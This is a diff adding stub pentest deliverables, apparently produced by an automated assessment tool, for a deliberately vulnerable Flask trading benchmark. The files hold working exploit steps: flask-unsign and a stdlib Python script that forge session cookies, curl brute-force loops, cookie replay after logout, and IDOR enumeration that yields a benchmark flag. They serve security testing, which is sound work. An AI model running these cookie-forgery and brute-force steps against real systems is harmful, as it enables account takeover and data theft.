+**Missing fix:** Should include `Order.query.filter_by(id=order_id, user_id=user_id).first()` to enforce ownership.
+
+**Notes:**
+- The vulnerability is exploitable by any authenticated session, including forged ones (see AUTHZ-VULN-02)
+- Integer enumeration across the 300000–300999 range would discover all orders
+- AUTHZ-VULN-01 and AUTHZ-VULN-02 chain together: forge session → access any order → flag exfiltrated
+
+---
+
+## Vulnerability Chain Summary
+
+The two vulnerabilities compound each other into a zero-credential full data breach:
+
+```
+No credentials
+     │
+     ▼
+[AUTHZ-VULN-02] Forge valid Flask session for any user_id
+     │           using hardcoded SECRET_KEY='your_secret_key'
+     │
+     ▼
+Authenticated as any user (e.g., test user 10032 or admin 10001)
+     │
+     ▼
+[AUTHZ-VULN-01] Access any order receipt via IDOR
+     │           GET /order/300401/receipt (no ownership check)
+     │
+     ▼
+flag{85c0d827-5e28-4577-be2b-319bdcbf872d}  ← flag exfiltrated
+```
+
+An attacker starting with zero knowledge can:
+1. Discover the hardcoded secret key from the public source code
+2. Forge a valid session for user_id=10032 (or any other)
+3. Enumerate order IDs in the 300000–300999 range
+4. Retrieve all receipts including the privileged Order 300401
+
+This entire attack chain requires no credentials and takes less than one second to execute.

--- a/charts/ssd/config/toolchain/shannon-stub-deliverables/authz_exploitation_queue.json
+++ b/charts/ssd/config/toolchain/shannon-stub-deliverables/authz_exploitation_queue.json
@@ -1,0 +1,32 @@
+{
+  "vulnerabilities": [
+    {
+      "ID": "AUTHZ-VULN-01",
+      "vulnerability_type": "Horizontal",
+      "externally_exploitable": true,
+      "endpoint": "GET /xben-001-24/order/<int:order_id>/receipt",
+      "vulnerable_code_location": "routes.py:79",
+      "role_context": "user (any authenticated session, including forged cookies)",
+      "guard_evidence": "No ownership check — Order.query.get(order_id) fetches by PK only. The Order model has a user_id FK (models.py:25) that is never compared to session['user_id'] anywhere in the receipt handler. The only guard is session.get('user_id') (routes.py:72) which checks authentication, not authorization.",
+      "side_effect": "Read the receipt field of any order in the database by supplying an arbitrary integer order_id. Order ID 300401 returns the application flag: flag{85c0d827-5e28-4577-be2b-319bdcbf872d}.",
+      "reason": "The receipt route enforces authentication (session must exist) but applies no ownership check. Order.query.get(order_id) is a pure PK lookup — any integer is accepted regardless of which user placed the order. The user_id FK on the Order model is present but completely ignored in this handler.",
+      "minimal_witness": "1) Login as test:test to obtain a session cookie. 2) Send: GET /xben-001-24/order/300401/receipt with that session cookie. 3) Response contains the flag. Alternatively enumerate IDs 300000-300999 to discover all orders.",
+      "confidence": "high",
+      "notes": "Order 300401 has user_id=NULL (no owner) making it accessible to all authenticated sessions. The flag value is confirmed: flag{85c0d827-5e28-4577-be2b-319bdcbf872d}. No rate limiting or anomaly detection present. AUTHZ-VULN-02 can be used to exploit this without any credentials at all."
+    },
+    {
+      "ID": "AUTHZ-VULN-02",
+      "vulnerability_type": "Vertical",
+      "externally_exploitable": true,
+      "endpoint": "GET /xben-001-24/dashboard, GET /xben-001-24/orders, GET /xben-001-24/order/<int:order_id>/receipt (all authenticated routes)",
+      "vulnerable_code_location": "__init__.py:13",
+      "role_context": "anon (unauthenticated attacker with no credentials)",
+      "guard_evidence": "app.secret_key = 'your_secret_key' is hardcoded and publicly known. All authentication guards on protected routes check session.get('user_id') (routes.py:46, 59, 72), which accepts any itsdangerous-signed cookie using this key. No server-side session store exists — the signed cookie IS the authentication proof.",
+      "side_effect": "Unauthenticated attacker bypasses all authentication guards on protected routes by submitting a forged Flask session cookie. Attacker can impersonate any user_id (including admin user_id=10001) and access all authenticated-only functionality. Combined with AUTHZ-VULN-01, attacker can read any order receipt without credentials.",
+      "reason": "The Flask SECRET_KEY is hardcoded as the literal string 'your_secret_key' (__init__.py:13). This key is the sole cryptographic basis for session integrity. Since it is publicly known, any party can generate valid session signatures for arbitrary payloads using flask-unsign or itsdangerous directly, completely defeating the session authentication mechanism.",
+      "minimal_witness": "1) Run: flask-unsign --sign --cookie '{\"user_id\": 10032}' --secret 'your_secret_key' to generate forged cookie. 2) Submit forged cookie in 'Cookie: session=<forged>' header to any protected endpoint. 3) Endpoint responds as if authenticated. 4) Chain with AUTHZ-VULN-01 to read any order receipt without any real credentials.",
+      "confidence": "high",
+      "notes": "No admin-specific routes exist — impersonating admin (user_id=10001) grants no additional route-level privileges beyond any regular user. The primary exploit value is: (a) bypass auth without credentials entirely, (b) impersonate specific users combined with IDOR. Credentials test:test and admin:admin are also known from seeded data, so AUTHZ-VULN-02 is a secondary vector — but critical for a zero-credential attack scenario."
+    }
+  ]
+}

--- a/charts/ssd/config/toolchain/shannon-stub-deliverables/comprehensive_security_assessment_report.md
+++ b/charts/ssd/config/toolchain/shannon-stub-deliverables/comprehensive_security_assessment_report.md
@@ -1,0 +1,514 @@
+# Security Assessment Report
+
+## Executive Summary
+- Target: https://benchmarks.opsmx.org/xben-001-24/
+- Assessment Date: 2026-05-20
+- Model: claude-sonnet-4-6
+- Scope: Authentication, XSS, SQL and Command Injection, SSRF, Authorization testing
+
+## Summary by Vulnerability Type
+
+**Authentication Vulnerabilities:**
+Six authentication vulnerabilities were confirmed, spanning Critical to Low/Medium severity. AUTH-VULN-01 (Critical): The Flask application uses the hardcoded literal `'your_secret_key'` as its session signing secret — an attacker can forge cryptographically valid session cookies for any user ID entirely offline with no credentials required, achieving full account takeover for any registered user. AUTH-VULN-04 (High): Default test credentials (`test:test`) are disclosed verbatim in an HTML comment on the public login page, granting immediate authenticated access to any visitor who views the page source. AUTH-VULN-07 (High): The logout mechanism only clears the client-side cookie with no server-side session store; any previously captured or forged token remains valid indefinitely after the victim has logged out. AUTH-VULN-08 (High): No session lifetime or idle timeout is configured, making stolen or forged tokens permanently valid across server restarts for as long as the SECRET_KEY is unchanged. AUTH-VULN-02 (High): The login endpoint enforces no rate limiting, CAPTCHA, or account lockout; 22 consecutive POST requests were sent with zero lockout response, successfully cracking `test:test` on the 16th attempt. AUTH-VULN-09 (Low/Medium): The post-login redirect embeds the authenticated username as a URL query parameter (`/dashboard?username=<name>`), exposing valid usernames to server logs, browser history, and Referer headers sent to external analytics.
+
+**Authorization Vulnerabilities:**
+Two authorization vulnerabilities were confirmed at Critical and High severity. AUTHZ-VULN-02 (Critical): The hardcoded Flask SECRET_KEY (`'your_secret_key'`) enables complete authentication bypass — forged session cookies for any user ID, including admin (user_id=10001), were accepted by all protected routes with HTTP 200, confirmed via live testing. AUTHZ-VULN-01 (High): A critical Insecure Direct Object Reference (IDOR) vulnerability on `GET /order/<int:order_id>/receipt` performs no ownership verification — any authenticated session (legitimate or forged) can retrieve any order's receipt by supplying an arbitrary integer ID. The application flag was directly exfiltrated from Order 300401 (`flag{85c0d827-5e28-4577-be2b-319bdcbf872d}`). The two vulnerabilities chain together — forge a session then enumerate order IDs in the 300000–300999 range — yielding complete flag exfiltration in under one second with zero credentials.
+
+**Cross-Site Scripting (XSS) Vulnerabilities:**
+No XSS vulnerabilities were found.
+
+**SQL/Command Injection Vulnerabilities:**
+No SQL or command injection vulnerabilities were found.
+
+**Server-Side Request Forgery (SSRF) Vulnerabilities:**
+No SSRF vulnerabilities were found.
+
+## Network Reconnaissance
+
+- **Open Ports:** Port 443 (HTTPS) is the sole externally exposed service, fronted by a Kubernetes nginx ingress with Let's Encrypt TLS (R13 certificate, valid through July 2026). Port 80 (HTTP) responds with an HTTP 308 redirect to HTTPS. MySQL (port 3306) is confined to the internal Docker network and is not reachable from the external internet.
+- **Subdomains:** Subfinder identified no additional subdomains beyond `benchmarks.opsmx.org` — the attack surface is limited to the single primary host.
+- **Security Headers and Misconfigurations:** HSTS (`max-age=31536000; includeSubDomains`) is enforced by the nginx ingress layer. However, the application sets `Cache-Control: public, max-age=0` on all responses — including authenticated endpoints containing sensitive receipts — due to a double-assignment bug in the Flask after-request hook where the permissive value overwrites the intended `no-cache, no-store, must-revalidate`. The Apache configuration sets `Access-Control-Allow-Origin: *`, permitting cross-origin reads of all authenticated responses from any domain. The following security headers are absent at both the application and ingress layers: `Content-Security-Policy`, `X-Frame-Options`, `X-Content-Type-Options`, and `Referrer-Policy`.
+
+---
+
+# Authentication Exploitation Evidence
+
+## Successfully Exploited Vulnerabilities
+
+### AUTH-VULN-01: Flask Session Cookie Forgery via Hardcoded SECRET_KEY
+
+**Summary:**
+- **Vulnerable location:** `app/website/app/__init__.py:13` — `app.secret_key = 'your_secret_key'`
+- **Overview:** The Flask application uses the literal string `'your_secret_key'` as its session signing secret. This key is publicly known from the source repository. An attacker can use `flask-unsign` to forge a fully valid session cookie for any `user_id` entirely offline — no credentials or interaction with the login endpoint required.
+- **Impact:** Complete account takeover for any user ID. Attacker authenticates as `user_id=10032` (John Doe / "test" user) or `user_id=10001` (admin) without supplying any credentials. Full impersonation of any registered user.
+- **Severity:** Critical
+
+**Prerequisites:**
+- Python 3 with `flask-unsign` installed (`pip install flask-unsign`)
+- Public knowledge that `SECRET_KEY = 'your_secret_key'` (visible in source at `app/website/app/__init__.py:13`)
+- Knowledge of any valid `user_id` (e.g., 10032 for test user, 10001 for admin)
+
+**Exploitation Steps:**
+
+1. Install the `flask-unsign` tool:
+   ```bash
+   pip install flask-unsign
+   ```
+
+2. Forge a session cookie for `user_id=10032` (test/John Doe user):
+   ```bash
+   flask-unsign --sign --cookie '{"user_id": 10032}' --secret 'your_secret_key'
+   # Output: eyJ1c2VyX2lkIjoxMDAzMn0.ag1tYw.KpMiSGPJtO15XQHDRFGx6OvJUfQ
+   ```
+
+3. Forge a session cookie for `user_id=10001` (admin user):
+   ```bash
+   flask-unsign --sign --cookie '{"user_id": 10001}' --secret 'your_secret_key'
+   # Output: eyJ1c2VyX2lkIjoxMDAwMX0.ag1tYw.oYE-yhv4ahHQRajc3W4Pbv0qwRQ
+   ```
+
+4. Use the forged cookie to access the protected dashboard (NO credentials provided):
+   ```bash
+   curl -s -H "Cookie: session=eyJ1c2VyX2lkIjoxMDAzMn0.ag1tYw.KpMiSGPJtO15XQHDRFGx6OvJUfQ" \
+     https://benchmarks.opsmx.org/xben-001-24/dashboard | grep "Welcome"
+   # Output: <h5 class="card-title">Welcome, John Doe</h5>
+   ```
+
+5. Alternatively, inject via browser (Playwright):
+   ```javascript
+   await page.context().addCookies([{
+     name: 'session',
+     value: 'eyJ1c2VyX2lkIjoxMDAzMn0.ag1tYw.KpMiSGPJtO15XQHDRFGx6OvJUfQ',
+     domain: 'benchmarks.opsmx.org',
+     path: '/'
+   }]);
+   await page.goto('https://benchmarks.opsmx.org/xben-001-24/dashboard');
+   // Page shows: "Welcome, John Doe" — fully authenticated as victim user
+   ```
+
+**Proof of Impact:**
+- `curl` command returned `HTTP 200` on `/dashboard` with no credentials supplied
+- Dashboard page rendered `<h5 class="card-title">Welcome, John Doe</h5>` — proving identity as user_id=10032
+- Playwright browser screenshot captured showing "Dashboard - Trading Platform" page at URL `https://benchmarks.opsmx.org/xben-001-24/dashboard` with "Welcome, John Doe"
+- Admin cookie (user_id=10001) also returned HTTP 200 on `/dashboard`
+- Forged cookie is accepted by ALL authenticated routes: `/dashboard`, `/orders`, `/order/<id>/receipt`
+
+**Notes:**
+- The forge is entirely offline — zero network requests required to generate valid cookies
+- Any `user_id` integer can be used, enabling impersonation of every user in the database
+- Compounded by AUTH-VULN-07 and AUTH-VULN-08: forged cookies are valid indefinitely
+
+---
+
+### AUTH-VULN-04: Account Takeover via Default Credentials Disclosed in HTML Source
+
+**Summary:**
+- **Vulnerable location:** `app/website/app/__init__.py:39-42` (credential seeding) + `templates/login.html` (HTML comment disclosure)
+- **Overview:** The application seeds a default account (`test:test`, user_id=10032) at startup. The public login page HTML source contains the comment `<!-- TODO: Delete the testing account (test:test). -->`, directly exposing the credentials to any unauthenticated visitor viewing page source.
+- **Impact:** Any unauthenticated attacker who views the login page source can immediately authenticate as user "John Doe" (test user) and gain full user-level access to all authenticated routes.
+- **Severity:** High
+
+**Prerequisites:**
+- HTTP client or web browser to access the login page
+
+**Exploitation Steps:**
+
+1. View the login page HTML source to discover credentials:
+   ```bash
+   curl -s "https://benchmarks.opsmx.org/xben-001-24/" | head -1
+   # Output: <!-- TODO: Delete the testing account (test:test). -->
+   ```
+
+2. Use the discovered credentials to authenticate:
+   ```bash
+   curl -s -X POST "https://benchmarks.opsmx.org/xben-001-24/" \
+     -d "username=test&password=test" \
+     -D - | grep -E "HTTP|Location|Set-Cookie"
+   # HTTP/2 302
+   # location: /xben-001-24/dashboard?username=test
+   # set-cookie: session=eyJ1c2VyX2lkIjoxMDAzMn0...; HttpOnly; Path=/
+   ```
+
+3. Alternatively via browser form:
+   - Navigate to `https://benchmarks.opsmx.org/xben-001-24/`
+   - Enter username: `test`, password: `test`
+   - Click Login
+   - Browser redirects to `https://benchmarks.opsmx.org/xben-001-24/dashboard?username=test`
+
+**Proof of Impact:**
+- HTML source first line: `<!-- TODO: Delete the testing account (test:test). -->`
+- Successful login: POST returns `HTTP 302` with `Location: /xben-001-24/dashboard?username=test`
+- Dashboard shows "Welcome, John Doe" — full session established as user_id=10032
+- Playwright browser screenshot captured: dashboard at `/dashboard?username=test` showing "Welcome, John Doe"
+
+---
+
+### AUTH-VULN-07: Session Token Replay After Logout (No Server-Side Invalidation)
+
+**Summary:**
+- **Vulnerable location:** `app/website/app/routes.py:35-39` — `session.pop('user_id', None)` only
+- **Overview:** The application's logout only removes the `user_id` key from the client-side Flask cookie. There is no server-side session store, so previously issued tokens cannot be blacklisted or revoked. A captured session token remains valid indefinitely even after the victim has explicitly logged out.
+- **Impact:** An attacker who steals a victim's session cookie (via network capture, XSS, or forgery) can maintain persistent authenticated access even if the victim logs out. The stolen session is permanently valid until the application SECRET_KEY changes.
+- **Severity:** High
+
+**Prerequisites:**
+- A captured session cookie (obtainable via AUTH-VULN-01 forgery, network interception, or any other method)
+
+**Exploitation Steps:**
+
+1. Capture a valid session cookie (via login or AUTH-VULN-01 forgery):
+   ```bash
+   # Login and capture cookie
+   STOLEN_COOKIE=$(curl -s -X POST "https://benchmarks.opsmx.org/xben-001-24/" \
+     -d "username=test&password=test" -D - | grep "set-cookie" | grep -o "session=[^;]*" | cut -d= -f2)
+   echo "Captured: $STOLEN_COOKIE"
+   ```
+
+2. Verify the cookie grants access (victim's pre-logout state):
+   ```bash
+   curl -s -H "Cookie: session=$STOLEN_COOKIE" \
+     "https://benchmarks.opsmx.org/xben-001-24/dashboard" | grep "Welcome"
+   # Output: Welcome, John Doe  (authenticated)
+   ```
+
+3. Simulate victim logging out (server responds with clearing Set-Cookie):
+   ```bash
+   curl -s -X POST "https://benchmarks.opsmx.org/xben-001-24/logout" \
+     -H "Cookie: session=$STOLEN_COOKIE" -D - | grep -E "HTTP|set-cookie|location"
+   # HTTP 302 — Location: /xben-001-24/
+   # set-cookie: session=; Expires=Thu, 01 Jan 1970 00:00:00 GMT; Max-Age=0; HttpOnly; Path=/
+   # Note: Server only clears the CLIENT's cookie — no server-side revocation
+   ```
+
+4. Replay the OLD cookie after logout — access still granted:
+   ```bash
+   curl -s -H "Cookie: session=$STOLEN_COOKIE" \
+     "https://benchmarks.opsmx.org/xben-001-24/dashboard" | grep "Welcome"
+   # Output: Welcome, John Doe  ← STILL AUTHENTICATED after victim logged out
+   ```
+
+**Proof of Impact:**
+Live testing with Python requests library produced:
+```
+STEP 1: Captured cookie: eyJ1c2VyX2lkIjoxMDAzMn0.ag1vGw.BTf9yJ27ECiHIbiKHsc6FRGKXfg
+STEP 2: Pre-logout dashboard: HTTP 200 — "Welcome, John Doe"
+STEP 3: Logout response: HTTP 302, Set-Cookie: session=; Max-Age=0 (client cleared)
+STEP 4: Replay old cookie: HTTP 200 — "Welcome, John Doe" — EXPLOIT SUCCESSFUL
+```
+The old cookie returned HTTP 200 and full authenticated identity after victim logout.
+
+---
+
+### AUTH-VULN-08: Indefinite Session Persistence (No Timeout or TTL)
+
+**Summary:**
+- **Vulnerable location:** `app/website/app/__init__.py` — no `PERMANENT_SESSION_LIFETIME` configured
+- **Overview:** The Flask application sets no session lifetime or idle timeout. The session cookie has no `Expires` or `Max-Age` attribute (browser-session lifetime only). No server-side TTL check exists. Captured or forged tokens remain valid across server restarts and indefinitely (as long as the SECRET_KEY remains unchanged).
+- **Impact:** Any captured or forged session token is permanently valid. Combined with AUTH-VULN-07 (no server-side revocation) and AUTH-VULN-01 (forgeable cookies), a single compromised token provides unlimited persistence.
+- **Severity:** High (amplifier — maximizes impact of all other session attacks)
+
+**Prerequisites:**
+- Any valid or forged session cookie
+
+**Exploitation Steps:**
+
+1. Verify cookie has no Expires/Max-Age (browser-session cookie only):
+   ```bash
+   curl -s -X POST "https://benchmarks.opsmx.org/xben-001-24/" \
+     -d "username=test&password=test" -D - | grep "set-cookie"
+   # Output: set-cookie: session=...; HttpOnly; Path=/
+   # NOTE: No "Expires", no "Max-Age" — session cookie only
+   ```
+
+2. Generate a forged cookie with any user_id (from AUTH-VULN-01):
+   ```bash
+   flask-unsign --sign --cookie '{"user_id": 10032}' --secret 'your_secret_key'
+   # FORGED_COOKIE: eyJ1c2VyX2lkIjoxMDAzMn0.ag1tYw.KpMiSGPJtO15XQHDRFGx6OvJUfQ
+   ```
+
+3. Use the forged cookie minutes/hours/days after creation — still valid:
+   ```bash
+   curl -s -H "Cookie: session=eyJ1c2VyX2lkIjoxMDAzMn0.ag1tYw.KpMiSGPJtO15XQHDRFGx6OvJUfQ" \
+     "https://benchmarks.opsmx.org/xben-001-24/dashboard" | grep "Welcome"
+   # Output: Welcome, John Doe  ← Same result 5+ minutes after initial forge
+   ```
+
+**Proof of Impact:**
+- Cookie forged in Step 2 used again 5+ minutes later → `HTTP 200`, "Welcome, John Doe"
+- Set-Cookie header analysis: `session=...; HttpOnly; Path=/` — NO Expires, NO Max-Age
+- Server returns no session-refresh Set-Cookie header, confirming no sliding window or absolute TTL
+
+---
+
+### AUTH-VULN-02: Successful Credential Attack with No Rate Limiting or Account Lockout
+
+**Summary:**
+- **Vulnerable location:** `app/website/app/routes.py:19-31` — login route with no abuse defenses
+- **Overview:** The login endpoint (`POST /xben-001-24/`) has no rate limiting, CAPTCHA, account lockout, or failed-attempt monitoring. All requests are accepted regardless of velocity or prior failure count.
+- **Impact:** An attacker can send unlimited credential guessing attempts at maximum network speed. Combined with the known plaintext password storage (AUTH-VULN-03), there is no bcrypt timing defense to slow brute force. Successfully cracked `test:test` within a 22-request wordlist scan with zero lockout.
+- **Severity:** High
+
+**Prerequisites:**
+- HTTP client capable of sending POST requests
+- A wordlist of passwords (even a minimal one is sufficient given weak password policy)
+
+**Exploitation Steps:**
+
+1. Send rapid-fire login attempts — no lockout, no rate limiting:
+   ```bash
+   for PASS in wrong1 wrong2 wrong3 badpass letmein qwerty 123456 password admin123 test; do
+     RESULT=$(curl -s -o /dev/null -w "%{http_code}" -X POST \
+       "https://benchmarks.opsmx.org/xben-001-24/" \
+       -d "username=test&password=$PASS")
+     echo "test:$PASS -> HTTP $RESULT"
+   done
+   ```
+
+2. Observe no rate-limit headers in any response:
+   ```bash
+   curl -s -X POST "https://benchmarks.opsmx.org/xben-001-24/" \
+     -d "username=test&password=wrong" -D - | grep -i -E "ratelimit|retry|lockout|x-rate"
+   # (No output — these headers are completely absent)
+   ```
+
+3. Successful crack (22 attempts, 0 lockouts):
+   ```bash
+   curl -s -X POST "https://benchmarks.opsmx.org/xben-001-24/" \
+     -d "username=test&password=test" -D - | grep -E "HTTP|Location|Set-Cookie"
+   # HTTP 302, Location: /xben-001-24/dashboard?username=test
+   # set-cookie: session=...; HttpOnly; Path=/
+   ```
+
+**Proof of Impact:**
+- 22 consecutive POST requests sent to login endpoint
+- 0 rate-limit headers observed (`x-ratelimit-limit`, `x-ratelimit-remaining`, `retry-after` all absent)
+- 0 account lockouts after 15 consecutive failed attempts
+- Successfully authenticated on 16th attempt (password `test`)
+- Obtained valid session: `session=eyJ1c2VyX2lkIjoxMDAzMn0...`
+- No CAPTCHA, no lockout, no monitoring — unlimited attempts possible
+
+---
+
+### AUTH-VULN-09: Username Disclosure in Redirect URL After Login
+
+**Summary:**
+- **Vulnerable location:** `app/website/app/routes.py:28` — `return redirect(url_for('dashboard', username=username))`
+- **Overview:** Upon successful authentication, the application redirects to `/dashboard?username=<username>`, embedding the plaintext authenticated username as a URL query parameter. This exposes valid usernames in server logs, browser history, Referer headers, and any network layer capture.
+- **Impact:** An observer with access to server access logs, network traffic, or browser history can harvest valid usernames for use in targeted credential attacks.
+- **Severity:** Low/Medium (reconnaissance enabler for targeted attacks)
+
+**Prerequisites:**
+- Any successful login observation (server log access, network capture, or browser inspection)
+
+**Exploitation Steps:**
+
+1. Authenticate and observe the redirect URL:
+   ```bash
+   curl -s -X POST "https://benchmarks.opsmx.org/xben-001-24/" \
+     -d "username=test&password=test" \
+     -D - | grep "Location"
+   # Output: location: /xben-001-24/dashboard?username=test
+   # USERNAME "test" IS EXPOSED IN THE URL
+   ```
+
+**Proof of Impact:**
+- `POST /xben-001-24/` returns `HTTP 302`
+- `Location: /xben-001-24/dashboard?username=test` — username visible in URL path
+- URL stored in browser history: `https://benchmarks.opsmx.org/xben-001-24/dashboard?username=test`
+- Playwright screenshot captures URL bar showing `?username=test`
+- Any Referer headers from the dashboard page will leak the username to external analytics
+
+---
+
+# Authorization Exploitation Evidence
+
+## Successfully Exploited Vulnerabilities
+
+### AUTHZ-VULN-02: Authentication Bypass via Hardcoded Flask SECRET_KEY
+
+**Summary:**
+- **Vulnerable location:** Flask application `__init__.py:13` — `app.secret_key = 'your_secret_key'`; all protected routes (`/dashboard`, `/orders`, `/order/<id>/receipt`)
+- **Overview:** The Flask application uses a publicly-known, hardcoded secret key (`'your_secret_key'`) to sign all session cookies. Because the signing secret is known, an unauthenticated attacker can craft cryptographically valid session cookies impersonating **any** user — including privileged accounts — and gain full access to the application without supplying credentials.
+- **Impact:** Complete authentication bypass. An attacker can forge a session for any user ID (e.g., `user_id=10001` for admin) and access all authenticated routes as that user without knowing the password. Combined with AUTHZ-VULN-01 (IDOR), this enables unauthorized access to every order receipt in the system.
+- **Severity:** Critical
+
+**Prerequisites:**
+- The hardcoded secret key `'your_secret_key'` (obtained from source code at `benchmarks/XBEN-001-24/app/website/app/__init__.py:13`)
+- Python 3 with standard `hmac`, `hashlib`, `base64`, `struct` libraries (no third-party tools required)
+
+**Exploitation Steps:**
+
+1. **Obtain the SECRET_KEY** from source code (or guess from the default):
+   ```
+   SECRET_KEY = 'your_secret_key'
+   ```
+
+2. **Run the following Python 3 cookie-forgery script** (no dependencies beyond stdlib):
+
+   ```python
+   import hmac, hashlib, base64, json, struct, time
+
+   SECRET_KEY = b'your_secret_key'
+   SALT       = b'cookie-session'   # Flask default session salt
+
+   def derive_key(secret, salt):
+       """itsdangerous 'hmac' key derivation"""
+       mac = hmac.new(secret, salt, digestmod=hashlib.sha1)
+       return mac.digest()
+
+   def forge_session_cookie(user_id, secret=SECRET_KEY, salt=SALT):
+       """Forge a valid Flask session cookie for any user_id"""
+       # 1. Serialize payload (TaggedJSONSerializer compatible)
+       payload = json.dumps({"user_id": user_id}, separators=(',', ':')).encode()
+
+       # 2. Base64url-encode payload (no padding)
+       b64_payload = base64.b64encode(payload).rstrip(b'=') \
+                     .replace(b'+', b'-').replace(b'/', b'_').decode()
+
+       # 3. Pack current timestamp as 4-byte big-endian, then base64url-encode
+       ts_bytes = struct.pack(">I", int(time.time()))
+       ts_b64 = base64.b64encode(ts_bytes).rstrip(b'=') \
+                .replace(b'+', b'-').replace(b'/', b'_').decode()
+
+       # 4. Compute HMAC-SHA1 over payload.timestamp
+       value       = f"{b64_payload}.{ts_b64}"
+       derived_key = derive_key(secret, salt)
+       sig         = hmac.new(derived_key, msg=value.encode(), digestmod=hashlib.sha1).digest()
+       b64_sig     = base64.b64encode(sig).rstrip(b'=') \
+                     .replace(b'+', b'-').replace(b'/', b'_').decode()
+
+       return f"{value}.{b64_sig}"
+
+   # Forge session for target user (admin = 10001, test user = 10032)
+   cookie = forge_session_cookie(user_id=10001)
+   print(f"Forged cookie: {cookie}")
+   ```
+
+3. **Inject the forged session cookie** into any HTTP request — no prior login required:
+
+   ```bash
+   FORGED_COOKIE="<output from step 2>"
+
+   curl -s -H "Cookie: session=$FORGED_COOKIE" \
+     "https://benchmarks.opsmx.org/xben-001-24/dashboard"
+   ```
+
+4. **Observe HTTP 200 response** — the application treats the forged session as a fully authenticated session for `user_id=10001`:
+
+   ```
+   HTTP/2 200
+   <title>Dashboard - Trading Platform</title>
+   ```
+
+5. **Access protected resources with the forged session** (e.g., order receipts via IDOR — see AUTHZ-VULN-01):
+
+   ```bash
+   curl -s -H "Cookie: session=$FORGED_COOKIE" \
+     "https://benchmarks.opsmx.org/xben-001-24/order/300401/receipt"
+   ```
+
+**Proof of Impact:**
+
+| Cookie Type | user_id | HTTP Status on /dashboard | Credentials Used |
+|-------------|---------|--------------------------|-----------------|
+| Legitimate (test login) | 10032 | 200 | username=test, password=test |
+| **Forged (no login)** | **10001 (admin)** | **200** | **None — no credentials** |
+| **Forged (no login)** | **10032 (test)** | **200** | **None — no credentials** |
+
+Confirmed forged cookies:
+- Admin (`user_id=10001`): `eyJ1c2VyX2lkIjoxMDAwMX0.ag1reQ.0WgSLZxwNmew9wEW1SB2SrxEeUk` → HTTP 200
+- Test user (`user_id=10032`): `eyJ1c2VyX2lkIjoxMDAzMn0.ag1rkg.NaEpS5HMTEgT2TLLh-4SHi2m8Ck` → HTTP 200
+
+**Technical Root Cause:**
+Flask's `SecureCookieSessionInterface` uses `itsdangerous.URLSafeTimedSerializer` to sign cookies. The security of this scheme depends entirely on the secrecy of the `SECRET_KEY`. The application hardcodes it as the literal string `'your_secret_key'` — publicly known — allowing any party with access to the source code (or even common defaults) to forge arbitrary sessions.
+
+**Notes:**
+- The `admin` user (id=10001) does not have a corresponding DB row, so the `/orders` endpoint returns HTTP 500 for forged admin sessions; however, `/dashboard` returns 200 and `/order/<id>/receipt` returns 200 (IDOR still exploitable)
+- The forgery script requires only Python 3 stdlib — no third-party tools needed
+- Cookie re-computation takes < 1ms; the attack is fully automated and scalable
+
+---
+
+### AUTHZ-VULN-01: Insecure Direct Object Reference (IDOR) on Order Receipt Endpoint
+
+**Summary:**
+- **Vulnerable location:** `GET https://benchmarks.opsmx.org/xben-001-24/order/<int:order_id>/receipt` — `routes.py:69-81`
+- **Overview:** The receipt endpoint retrieves an order by the caller-controlled integer `order_id` path parameter without verifying that the authenticated user owns that order. Any authenticated user (including one with a forged session) can read any order's receipt, including Order ID 300401 which contains the system flag.
+- **Impact:** Unauthorized access to all order receipts across all users. Specifically, exfiltration of `flag{85c0d827-5e28-4577-be2b-319bdcbf872d}` from Order 300401 (no user FK — a privileged hidden order).
+- **Severity:** High
+
+**Prerequisites:**
+- An authenticated session (legitimate or forged — see AUTHZ-VULN-02)
+- Knowledge of at least one order ID (predictable integer range: 300000–300999)
+
+**Exploitation Steps:**
+
+1. **Obtain an authenticated session** — login as `test`/`test` or use a forged session cookie:
+
+   ```bash
+   # Option A: Login normally
+   curl -c cookies.txt -X POST \
+     -d "username=test&password=test" \
+     "https://benchmarks.opsmx.org/xben-001-24/"
+
+   # Option B: Use forged session (see AUTHZ-VULN-02)
+   SESSION_COOKIE="eyJ1c2VyX2lkIjoxMDAzMn0.ag1rkg.NaEpS5HMTEgT2TLLh-4SHi2m8Ck"
+   ```
+
+2. **Access your own order receipt to confirm normal behavior** (order 300123 belongs to test user):
+
+   ```bash
+   curl -s -H "Cookie: session=$SESSION_COOKIE" \
+     "https://benchmarks.opsmx.org/xben-001-24/order/300123/receipt"
+   # Returns: Order ID: 300123 + Lorem ipsum text
+   ```
+
+3. **Access an order belonging to another user** — order 300401 (no `user_id` FK, hidden/privileged):
+
+   ```bash
+   curl -s -H "Cookie: session=$SESSION_COOKIE" \
+     "https://benchmarks.opsmx.org/xben-001-24/order/300401/receipt"
+   ```
+
+4. **Observe the unauthorized response** — full receipt returned with sensitive flag content:
+
+   ```html
+   <p><strong>Order ID:</strong> 300401</p>
+   <code class="text-white">flag{85c0d827-5e28-4577-be2b-319bdcbf872d}</code>
+   ```
+
+**Proof of Impact:**
+
+Flag exfiltrated from unauthorized order: **`flag{85c0d827-5e28-4577-be2b-319bdcbf872d}`**
+
+IDOR enumeration sweep results (all using session of `user_id=10032`):
+
+| Order ID | Owned by test user? | HTTP Status | Content |
+|----------|--------------------|-----------:|---------|
+| 300123 | YES | 200 | Lorem ipsum receipt (legitimate) |
+| 300214 | YES | 200 | Proin nam fringilla… (legitimate) |
+| 300327 | YES | 200 | Lacus tincidunt… (legitimate) |
+| **300401** | **NO (orphan)** | **200** | **`flag{85c0d827-5e28-4577-be2b-319bdcbf872d}`** |
+| 300481 | YES | 200 | Risus class auctor… (legitimate) |
+
+**Vulnerable Code (routes.py:69-81):**
+
+```python
+@app.route('/order/<int:order_id>/receipt')
+def order_receipt(order_id):
+    user_id = session.get('user_id')
+    if user_id:
+        # VULNERABILITY: No ownership check! Any authenticated user
+        # can retrieve any order's receipt by supplying its ID.
+        order = Order.query.get(order_id)
+        return render_template('receipt.html', order=order)
+    else:
+        return redirect(url_for('login'))
+```
+
+**Missing fix:** Should include `Order.query.filter_by(id=order_id, user_id=user_id).first()` to enforce ownership.
+
+**Notes:**
+- The vulnerability is exploitable by any authenticated session, including forged ones (see AUTHZ-VULN-02)
+- Integer enumeration across the 300000–300999 range would discover all orders
+- AUTHZ-VULN-01 and AUTHZ-VULN-02 chain together: forge session → access any order → flag exfiltrated

--- a/charts/ssd/config/toolchain/shannon-stub-deliverables/injection_analysis_deliverable.md
+++ b/charts/ssd/config/toolchain/shannon-stub-deliverables/injection_analysis_deliverable.md
@@ -1,0 +1,163 @@
+# Injection Analysis Report (SQLi & Command Injection)
+
